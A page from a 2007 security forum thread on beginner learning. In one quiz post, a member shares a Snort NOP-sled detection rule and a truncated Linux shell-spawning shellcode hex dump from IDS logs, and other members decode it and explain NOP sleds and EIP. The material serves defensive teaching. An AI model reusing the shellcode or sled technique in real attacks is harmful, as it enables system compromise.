Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 34 guests and 1 member online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow Noob!!!
EH-Net
May 21, 2013, 07:20:42 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: 1 2 [3] 4   Go Down
  Print  
Author Topic: Noob!!!  (Read 31754 times)
0 Members and 1 Guest are viewing this topic.
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #30 on: November 24, 2007, 07:49:34 PM »

I think the problem with the internet forums is semantics. Sometimes people read things differently than what a poster might mean.  I know I am guilty of doing that.  I agree with your comment pseud0 about both are valid as long as some place TCP/IP is fully understood. I made a post a year ago recommending someone learn TCP/IP as a foundation. But not just memorize it, but actually try and visualize it in their head. Infact, why not learn both tools and TCP/IP at the same time if you are lacking in that understanding. Even Emanon seemed to state that if you want to get good you need it.  To be honest I didnt understand what you meant by "taste great, less filling" but that is I am sure that is due to my dense head.  One thing I have learned is saying things like that can be open to all kinds of interpretations in a "heated" thread.
Logged
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #31 on: November 24, 2007, 07:52:45 PM »

Hey we are on page 3 now, lol!  Not to change the subject, but has any topic here made it to 4 pages? Just curious.
Logged
sedated
Newbie
*
Offline Offline

Posts: 37



View Profile
« Reply #32 on: November 24, 2007, 07:58:57 PM »

So moral of thread was learning everything is important its all needed but reading books on tcp/ip is so boring. Cool
Logged
nebu10uz
Sr. Member
****
Offline Offline

Posts: 368



View Profile WWW
« Reply #33 on: November 24, 2007, 08:06:13 PM »


Hey Kev, to answer your question, my review on OSCP made it to 4 pages:

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1152.0/
Logged

Security+, OSCP, CEH
pseud0
Recruiters
Full Member
*
Offline Offline

Posts: 208



View Profile
« Reply #34 on: November 24, 2007, 08:08:35 PM »

the "tastes great, less filling" was the old Miller Lite advertisement...
http://video.google.com/videoplay?docid=-6857860323414691675&q=tastes+great+less+filling&total=21&start=0&num=10&so=0&type=search&plindex=3
Logged

CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
nebu10uz
Sr. Member
****
Offline Offline

Posts: 368



View Profile WWW
« Reply #35 on: November 24, 2007, 08:15:44 PM »


There's something I still want to add to this thread. The book "Programming Linux Hacker Tools Uncovered" by Ivan Sklyarov is a good example why you need to know TCP/IP. By having a strong foundation on TCP/IP you can write code to exploit, backdoor a system, scan your brains out and etc.

By having a little knowledge in TCP/IP, I fully enjoyed this book. It was my first time that I saw TCP/IP in a programmatic  way. All code is written in C plus all the source code comes in a CD. I highly recommended.
Logged

Security+, OSCP, CEH
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #36 on: November 24, 2007, 08:32:46 PM »


Actually I found the commercial a little more intriguing than this thread, LOL. Hey I am guy give me a break!   I am not familiar with that book Blackazarro, sounds good and I will check it out.  Maybe we should stop this thread so it doesnt take away from Blackazarro's 4 page record, lol!  4 pages is a record right?
Logged
sedated
Newbie
*
Offline Offline

Posts: 37



View Profile
« Reply #37 on: November 24, 2007, 08:34:35 PM »

You know it might be a good idea to have a sticky post for newcomers interested in the field of information security on what they should probably
learn with links to some books for them maybe have a short tutorial of what
the jobs entail and certs to get there.I would write one out but as i am currently in the learning process myself it might not be best.If there is already a thread like this i apologize didn't see one.
Logged
dean
Guest
« Reply #38 on: November 24, 2007, 08:58:36 PM »

heh, seems the thread is not dead but perhaps it should be. Good point on knowing TCP/IP for socket programming, etc...blackazarro.

Anyway, glad to see the thread sparked some interest. But the thread did also start to get into the differences between hacking and pentesting. I don't see the point in posting about that now but seeing as how the importance of tcp/ip & knowing how to read packets, etc... came up again, here is a little quiz. It's pretty simple if you can read hex. Smiley

From a pentesters perspective knowing what the payload of an exploit looks like and why the IDS alerts on it is important as this can help when trying to bypass IDSes, etc...

I just pulled this out my IDS logs: The destination IP is my Windows 2003 IIS server.

alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS
  (msg:"SHELLCODE x86 NOOP"; content: "|90 90 90 90 90 90
  90 90 90 90 90 90 90 90|"; depth: 128;
  reference:arachnids,181; classtype:shellcode-detect;
  sid:648; rev:5;)

it contained the following payload:

--snip--
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
--snip--

What does the hex 0x90 represent?

What is the purpose of the 0x90 in the content?

Based on the information available would you classify this alert as an event to log and ignore or something to be concerned about and to dig into further?

dean
Logged
don
Editor-In-Chief
Administrator
Hero Member
*****
Online Online

Posts: 4165


Editor-In-Chief


View Profile WWW
« Reply #39 on: November 24, 2007, 09:36:35 PM »

Not only does that sound like a great new thread (hint hint), but how about a new board for security quizzes? Or maybe just post quizzes of the topic you like in a board that already exists? They can be anything you want... associated with a job desc or a specific cert.

So should I lock this topic?

Don
Logged

CISSP, MCSE, CSTA, Security+ SME
pseud0
Recruiters
Full Member
*
Offline Offline

Posts: 208



View Profile
« Reply #40 on: November 24, 2007, 09:41:22 PM »

0x90s are NOOPs on x86 systems.  Basically you use them to move your point of reference in a selected area of memory to a place of your choosing, then you dump in the selected payload (the rest of the code that isn't 0x90).  This is a normal approach for buffer overflows.
Logged

CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #41 on: November 24, 2007, 10:48:38 PM »

Hmm, good post Dean. I like the idea of a challenge or testing part of the forum. It would be good for those new to this. Just simple things like what you posted. Simple snort logs,etc...  Not full out challenges.
Logged
nicky.coder
Newbie
*
Offline Offline

Posts: 14


View Profile
« Reply #42 on: November 24, 2007, 11:15:04 PM »


I just pulled this out my IDS logs: The destination IP is my Windows 2003 IIS server.

alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS
  (msg:"SHELLCODE x86 NOOP"; content: "|90 90 90 90 90 90
  90 90 90 90 90 90 90 90|"; depth: 128;
  reference:arachnids,181; classtype:shellcode-detect;
  sid:648; rev:5;)

it contained the following payload:

--snip--
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
--snip--

What does the hex 0x90 represent?

What is the purpose of the 0x90 in the content?

Based on the information available would you classify this alert as an event to log and ignore or something to be concerned about and to dig into further?

dean



The above hex encoded string is the normal "shellcode" to get a shell. Initial part is filled with "nops" so even if the eip falls anywhere near should reach at the shellcode.
The behaviour of this "sc" is to first set a group id "setgid", then to set session id "setsid". Towards the end it tries to call the "execve" to execute /bin/sh..

Anyway tis was the postmortem report of the small snippet you posted. The last hex byte was missing which should be "68"

This is not a good shellcode..It needs some minor tweakings for successful exploitation and it is not affected to a windows machine [because it is a linux shellcode]

Had some fun in reverse engineering that stuff!!!
Logged

Sec+, OSCP
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #43 on: November 24, 2007, 11:25:17 PM »

I guess the responses are proving my point as far as interest. But how can we keep it for newbs for a  little while before others more experienced respond?  I mean, this would work well if we gave people new to this a little time to respond before more advanced jumped all over it?  I mean if we had an area for this and dedicated to those trying to learn basics. Or maybe everyone jumping on it is a good exposure for even those just beginning?  Hey, I might be way off  the target but this thread did start off as how can a newbie get started right?
Logged
dean
Guest
« Reply #44 on: November 25, 2007, 08:37:36 AM »

Nice, nicky.coder. That is pretty much it.

The exploit would actually work though. It was an old openSSH exploit. I only copied the part that was valid to the questions. Nice catch on the /bin/sh as well. That is the telling part as to whether to treat this as an event or incident.

Just to add a few definitions to nicky.coder's response.

1. EIP – INSTRUCTION POINTER REGISTER – controls program execution by pointing to the address of next instruction to be executed. The Instruction is executed and  the instruction pointer is incremented. When a jump is encountered, the instruction pointer’s value is altered to point to a new location in memory.

2. NOOP. A "NOP" or "NOOP" sled is, as inferred, a lot of NO Operations. The reason for the sled is that an attacker does not know the memory location where the executable code is and it is difficult to guess the location of the shellcode (your exploit payload) in memory and so it is difficult to set the return pointer.
An easier and more reliable method is to create a NOOP Sled.
Include NOOPs in advance of the executable code and if the pointer goes into NOOP Sled nothing will happen and execution will continue down the stack until executable instructions are reached.

dean

Quote
But how can we keep it for newbs for a  little while before others more experienced respond?  I mean, this would work well if we gave people new to this a little time to respond before more advanced jumped all over it?

Kev, as for keeping it for people learning or starting out, don't you think they'll learn just as much from see other people posting? Honestly, I expected more than one person to answer it too.
Logged
Pages: 1 2 [3] 4   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.06 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.